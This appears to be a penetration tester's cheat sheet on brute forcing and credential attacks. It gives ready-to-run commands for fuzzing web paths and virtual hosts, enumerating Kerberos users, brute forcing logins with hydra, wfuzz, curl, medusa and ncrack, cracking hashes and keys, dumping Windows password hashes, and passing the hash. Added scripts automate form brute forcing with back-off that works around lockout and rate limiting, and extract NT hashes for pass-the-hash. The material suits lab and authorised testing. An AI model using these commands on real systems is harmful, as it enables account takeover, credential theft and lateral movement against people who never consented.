Good Post: Bruteforcing using Custom Scripts
Crunch:
crunch 8 8 -t <pattern> -o list.txt
#To generate candidates shaped like Bha!!123 (upper, lower, lower, special, special, digit, digit, digit):
crunch 8 8 -t ,@@^^%%% -o list.txt
#, = upper case letter, @ = lower case letter, ^ = special character, % = number
Generating Wordlists using kwprocessor
kwprocessor generates keyboard-walk passwords, i.e. the strings users produce by running a finger along the keyboard.
example: qwertyuiop[]\
git clone https://github.com/hashcat/kwprocessor.git
cd kwprocessor && make
#Create keyboard walks from a base charset, a keymap and a route file (the routes describe how users move across the keyboard)
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt
Fuzzing for Webpages
#wfuzz: FUZZ is replaced from the wordlist and FUZ2Z from the extension list; --hc hides responses with those status codes
wfuzz -c -w rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100
#gobuster dir appends each word to the URL itself (no FUZZ keyword); -b hides status codes, -k ignores certificate errors.
#Note that in gobuster -s is the list of status codes to show, not to hide, so "-s 404" would display only the 404s
gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404 -k
#gobuster fuzz mode needs the FUZZ keyword in the URL; -b hides status codes, -k ignores certificate errors
gobuster fuzz -k -u http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404
#dirsearch: -e extensions to try, -x status codes to exclude
dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404
Fuzzing Webpages using bash
#Generate candidate URLs for a numeric parameter; feed the list to wfuzz or curl afterwards
for id in $(seq 1 10000); do echo "http://www.xyz.com/index.php?id=$id"; done > urls.txt
Bruteforcing Kerberos Usernames (Kerbrute, from GitHub)
#userenum asks the KDC for each name; valid users answer differently from unknown ones, with no failed logons recorded
./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts
#--hc 400 hides bad-request responses; --hh 8193 hides responses of the baseline size, i.e. what the server returns for an unknown Host header
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193
Subdomain Brute Force
wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb
*All Wordlists are from SecLists
First request a host that does not exist to learn the baseline response (here 28 words), then hide every response with that word count (--hw 28); whatever remains is a real virtual host.
wfuzz -c --hw 28 -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb
add the discovered hostnames to /etc/hosts
Subdomain Bruteforce using wfuzz
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "HOST:FUZZ.bhanu.notes" -u http://10.10.10.10/ --hc 400,301 -t 50 -c
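The wfuzz commands above rely on you spotting the baseline size or word count by hand and then passing it to --hh/--hw. The script below is an added example (not from the original page) that automates that step with curl: it requests a hostname that certainly does not exist, records its status code and body size, and then prints only the candidate hosts whose response differs. TARGET, DOMAIN and the wordlist name are assumed placeholders.

```shell
#!/usr/bin/env bash
# vhost-fuzz.sh - virtual-host brute force with automatic baseline filtering.
# Added example, not from the page. Assumes bash, curl and a wordlist of
# subdomain labels (one per line). TARGET and DOMAIN are placeholders.
set -u

TARGET="${TARGET:-http://10.10.10.10/}"   # assumed target URL (IP, not the vhost name)
DOMAIN="${DOMAIN:-redcross.htb}"          # assumed base domain
WORDLIST="${1:-subdomains-top1mil-5000.txt}"

# fetch <host> -> prints "<status> <body_bytes>" for a request carrying that Host header.
# Redefine this function to run the logic without a network (see usage note).
fetch() {
    curl -ks -o /dev/null -w '%{http_code} %{size_download}' \
         -H "Host: $1" "$TARGET"
}

# baseline -> the response for a host that cannot exist; this is what wfuzz's --hh/--hw would hide.
baseline() {
    fetch "this-host-does-not-exist-$RANDOM.$DOMAIN"
}

# differs <baseline> <response> -> true when status or size changed.
differs() {
    [ "$1" != "$2" ]
}

# run <wordlist> -> prints "host status size" for every candidate that differs from the baseline.
run() {
    local base host resp label
    base=$(baseline)
    while IFS= read -r label; do
        [ -z "$label" ] && continue
        host="$label.$DOMAIN"
        resp=$(fetch "$host")
        if differs "$base" "$resp"; then
            printf '%s %s\n' "$host" "$resp"
        fi
    done < "$1"
}

# Stand-alone use: VHOST_RUN=1 TARGET=http://10.10.10.10/ DOMAIN=redcross.htb ./vhost-fuzz.sh subdomains.txt
if [ -n "${VHOST_RUN:-}" ]; then
    run "$WORDLIST"
fi
```

Comparing status and byte size together is the same idea as wfuzz's --hc plus --hh; if the error page echoes the requested hostname its size changes with every word, in which case compare a word count (the --hw approach) instead.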
Fuzzing using Wget (crawl a site to build a wordlist)
#-R: do not download pages ending with these extensions; -nd: no directory hierarchy; -P: directory to save the files into
wget -nd -r -R html,asp,php,aspx -P crawl/ hackingdream.net
#-A: only download pages ending with these extensions (documents often contain names, emails and internal terms)
wget -nd -r -A doc,pdf,docx,xls -P crawl/ hackingdream.net
Cewl for emails in a webpage
#-e extracts email addresses, -n suppresses the word list
cewl -n -e http://10.10.10.10 > emails.txt
Bruteforcing Passwords - POST Using WFuzz
Intercept the admin login request after entering a username and password and copy the form data (the POST body), or:
Firefox --> go to the login page --> hit F12 --> Network --> enter creds --> submit --> select the POST request in the Network tab
--> Headers tab --> click "Resend" and select "Edit and Resend" --> the request body is shown there
Use that body for the -d option, replacing the value you want to brute force with FUZZ
#Both fields FUZZ: each name from the list is tried as its own password; --hh 11 hides the 11-character failure response
wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt
More wfuzz POST examples
#--hc 200 hides the failure page when the login form answers failures with 200 and successes with a redirect
wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c
#--hw 16 hides responses of the failure word count; -d implies POST, so -X POST is optional
wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt
wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -d "user=admin&password=FUZZ" -z file,rockyou.txt
#HTTP basic auth: --basic user:FUZZ, hide the 401s that every wrong password produces
wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401
Brute Forcing Passwords using Curl
#Basic auth, one request per password; -k ignores certificate errors. Read the list line by line so passwords containing spaces stay intact, and do not background the loop body with "&" (that floods the target and scrambles the output)
while IFS= read -r pass; do curl -k -s -o /dev/null -w "%{http_code} $pass\n" https://10.10.10.10 -u root:"$pass"; done < /usr/share/wordlists/rockyou.txt
-------------------------------------------------------
#Read "user pass" pairs from a file; --fail makes curl exit non-zero on HTTP 4xx/5xx, so test the command directly (a second test of $? would see the result of the first test, not of curl)
if [ $# -ne 1 ]; then
    echo "Usage: ./script <input-file>"
    exit 1
fi
while read -r user pass; do
    if curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login >/dev/null 2>&1; then
        echo "ok: $user:$pass"
    else
        echo "failed: $user:$pass"
    fi
done < "$1"
-----------------------------------------
#Nested loops over a user and a password generator (userlist_gen and passlist_gen stand for your own commands). A 302 redirect counts as a successful login; do not add -L here, because then %{http_code} reports the page after the redirect instead of the 302 itself
url="http://foo.dev/login"
for user in $(userlist_gen); do
    for pass in $(passlist_gen); do
        http_code=$(curl --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s)
        if [[ $http_code -eq 302 ]]; then
            echo "Success: User: '$user' Pass: '$pass'"
            break 2
        fi
    done
done
-------------------------------------------- WORKS GOOD ------------------------------------------
#Basic auth against a console; anything other than 401 is treated as a hit, so verify it by hand (a 5xx, a lockout page or a dropped connection would match too)
url="https://172.23.161.130/console"
while IFS= read -r pass; do
    http_code=$(curl -k "$url" -u root:"$pass" -w '%{http_code}' -o /dev/null -s)
    if [[ $http_code -ne 401 ]]; then
        echo "Success: User: root, Pass: '$pass'"
        break
    else
        echo "Wrong Password root:$pass"
    fi
done < /usr/share/wordlists/rockyou.txt
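The curl loops above treat every non-401 or every 302 as a hit and keep hammering the target when it starts throttling. The script below is an added example (not from the original page) of the same POST brute force with two practitioner additions: a classify step that separates "logged in" from "locked out / rate limited" responses, and an exponential back-off that retries the same pair instead of silently skipping it. TARGET_URL, the form field names user/password and the success code 302 are assumptions; adjust them to the target.

```shell
#!/usr/bin/env bash
# brute-login.sh - POST form brute force with curl, stopping on the first hit and
# backing off on lockout / rate-limit responses. Added example, not from the page.
# Assumes bash, curl, a file of "user pass" pairs, field names user/password and
# that a successful login redirects (302); SUCCESS_CODES overrides the latter.
set -u

URL="${TARGET_URL:-}"                  # e.g. http://foo.dev/login (assumed placeholder)
SUCCESS_CODES="${SUCCESS_CODES:-302}"  # space-separated status codes meaning "logged in"
MAX_BACKOFF=60                         # seconds; give up on a pair once the pause exceeds this

# try_login <user> <pass> -> prints the HTTP status code (000 when the connection fails).
# No -L: with redirects followed, %{http_code} would report the landing page, not the 302.
try_login() {
    curl -ks -o /dev/null -w '%{http_code}' \
         --data-urlencode "user=$1" --data-urlencode "password=$2" "$URL"
}

# classify <code> -> success | locked | fail
classify() {
    local c
    for c in $SUCCESS_CODES; do [ "$1" = "$c" ] && { echo success; return; }; done
    case "$1" in
        429|423|503|000) echo locked ;;   # throttled, locked, overloaded or unreachable
        *)               echo fail ;;
    esac
}

# brute <pairs-file> -> prints "user:pass" of the first valid pair and returns 0;
# returns 1 when the list is exhausted, 2 when the target keeps refusing.
brute() {
    local user pass code verdict backoff="${BACKOFF:-2}"
    while read -r user pass; do
        [ -z "$user" ] && continue
        code=$(try_login "$user" "$pass")
        verdict=$(classify "$code")
        while [ "$verdict" = locked ] && [ "$backoff" -le "$MAX_BACKOFF" ]; do
            sleep "$backoff"                   # wait, then retry the same pair
            backoff=$((backoff * 2 + 1))
            code=$(try_login "$user" "$pass")
            verdict=$(classify "$code")
        done
        if [ "$verdict" = locked ]; then
            echo "target still refusing at $user:$pass, aborting" >&2
            return 2
        fi
        if [ "$verdict" = success ]; then
            echo "$user:$pass"
            return 0
        fi
    done < "$1"
    return 1
}

# Stand-alone use: TARGET_URL=http://foo.dev/login ./brute-login.sh pairs.txt
if [ -n "$URL" ] && [ $# -ge 1 ]; then
    brute "$1"
fi
```

Keeping the request in its own try_login function means the loop can be exercised against a stub before pointing it at a real host, and the classify table is the one place to edit when a target signals failure with 200 and success with a different body size rather than a status code.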
WPSCAN:
#-U user list, -P password list, -t threads
wpscan --url http://192.168.0.107 -P passwords.txt -U users.txt -t 20
#enumerate all plugins, themes and users
wpscan --url http://10.40.10.10/ -e ap,t,u
Hydra:
hydra -l admin -P wordlist.txt -v VICTIM_IP ftp
hydra -l username -P password_file.txt -s PORT -f IP_ADDRESS REQUEST_METHOD /path
hydra -l admin -P 1000_common_passwords.txt -s 8080 -f 10.10.10.10 http-get /index.html
#For WordPress: the part after the last colon is the marker hydra looks for in the response, F= a failure string or S= a success string/status
hydra -L users.txt -P wordlist.txt -V 192.168.0.107 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:F=invalid'
hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator
#FILE0/FILE1/FILE2 are replaced from the numbered files; -x ignore:code=401 drops the failed attempts from the output
patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401
Cracking PuTTY Private Keys (.ppk)
sudo apt install putty-tools
#Convert the .ppk to an OpenSSH id_rsa for ssh login; if puttygen asks for a passphrase the key is encrypted and the passphrase has to be cracked first
puttygen private.ppk -O private-openssh -o id_rsa
putty2john private.ppk > hash
john --format=PuTTY --fork=4 --wordlist=wordlist.txt hash
#Enter the cracked passphrase when prompted, then chmod 600 id_rsa before using it with ssh -i
puttygen private.ppk -O private-openssh -o id_rsa
Cracking Hashes stored in a MySQL Database
mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;
#sample hash: the $1$ prefix is md5crypt (hashcat mode 500), not MySQL's own password hash (modes 200/300)
$1$llol$srpNQb9srgHAqNAes0FGC1
hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking BitLocker Recovery Keys using John
#The recovery key is 8 groups of 6 digits separated by dashes; [-] in the mask is a literal dash. The full keyspace is 10^48, so a blind mask attack is infeasible and only makes sense when most of the key is already known
john --format=bitlocker-opencl --mask='?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d' target_hash
you can also use bitcracker
PWDUMP/fgdump: Used to dump Windows password hashes; needs admin privileges to work.
just run fgdump.exe in cmd and the hashes get dumped to a text file.
/etc/shadow Hashes
if the hash starts with
$1$ - MD5 (md5crypt)
_ - BSDi Extended DES
$2$, $2a$, $2b$ or $2y$ - bcrypt (Blowfish-based)
$5$ - SHA-256 (sha256crypt)
$6$ - SHA-512 (sha512crypt)
$y$ - yescrypt (the default on recent Debian and Ubuntu)
Windows Credential Editor (WCE):
wce64.exe -w   #dump cleartext passwords from memory
Passing the Hash to log in to Windows:
pth-winexe
#SMBHASH takes the LM:NT pair exactly as dumped by fgdump/pwdump
export SMBHASH=LMHASH:NTHASH
pth-winexe -U administrator% //VICTIM_IP cmd
Pass the Password
crackmapexec IP_Address -u username -d domain_name -p password
crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1
Pass the Hash
#pwdump format is user:RID:LMHASH:NTHASH:::, copy the last set (the NT hash); the values below are placeholders, not real hashes
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243:::
crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243
#--local-auth authenticates against each host's local SAM instead of the domain
crackmapexec 10.10.10.10/24 -u bhanu -H 4332k4b32kj4b32jh4v3243 --local-auth
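"Copy the last set of the hash" is easy to get wrong on a large dump, and a dump always contains accounts that are useless for pass-the-hash: lines whose NT field is the hash of the empty password (a disabled or never-set account) and lines whose fields are not hashes at all. The script below is an added example (not from the original page) that parses pwdump/fgdump-style lines into "user nthash" pairs and drops those cases. The sample lines in the usage note are constructed; the two well-known constants for the empty LM and empty NT hash are real.

```shell
#!/usr/bin/env bash
# pth-targets.sh - pull usable NT hashes out of pwdump/fgdump style output for
# pass-the-hash. Added example, not from the page. Expected line format:
#   user:RID:LMHASH:NTHASH:::
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# is_hex32 <s> -> true when s is exactly 32 hex characters
is_hex32() { printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'; }

# nt_hash <pwdump-line> -> prints "user nthash" (lower-case) or nothing if the line is unusable
nt_hash() {
    local user rid lm nt rest
    IFS=: read -r user rid lm nt rest <<EOF
$1
EOF
    is_hex32 "$nt" || return 1              # malformed or placeholder line
    nt=$(printf '%s' "$nt" | tr 'A-F' 'a-f')
    [ "$nt" = "$EMPTY_NT" ] && return 1      # blank password: nothing worth passing
    printf '%s %s\n' "$user" "$nt"
}

# targets <pwdump-file> -> one "user nthash" line per usable account
targets() {
    local line
    while IFS= read -r line; do
        nt_hash "$line" || true
    done < "$1"
}

# Stand-alone use: ./pth-targets.sh dump.txt
# Each output pair can then be fed to crackmapexec <range> -u <user> -H <nthash>
if [ $# -ge 1 ]; then
    targets "$1"
fi
```

Hashes are lower-cased because fgdump writes them in upper case while most tools and comparisons expect lower case; the LM field is read but not used, since only the NT hash is needed for pass-the-hash.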
Password Profiling:
Creating wordlists from a webpage or any other source.
cewl www.website.com -m 6 -w /root/wordlist-cewl.txt   #-m 6: only words of at least 6 characters
Password Mutation:
nano /etc/john/john.conf
#Add the rule under the [List.Rules:Wordlist] section, which is what --rules applies: $[0-9]$[0-9] appends two digits to each word
john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt   #apply the rules and write the mutated candidates out instead of cracking
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:
ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
#CL=1 limits ncrack to a single connection: RDP does not tolerate many parallel logins, so do not raise it
LM and NTLM Hashes:
-------------------
Windows NT up to Server 2003 stored two different hashes of each password: the LAN Manager (LM) hash and the NT (NTLM) hash.
LM Hashing: weak; the password is converted to upper case, padded to 14 characters and split into two 7-character halves,
-----------
each half is hashed separately (used as a DES key to encrypt a fixed string), so a password longer than 7 characters is cracked as two short ones,
no salt --> prone to rainbow table attacks
NTLM Hashing: MD4 of the UTF-16LE password, also unsalted; stored in the SAM. From Windows Vista onwards the LM hash is no longer stored by default, only the NT hash.
--------------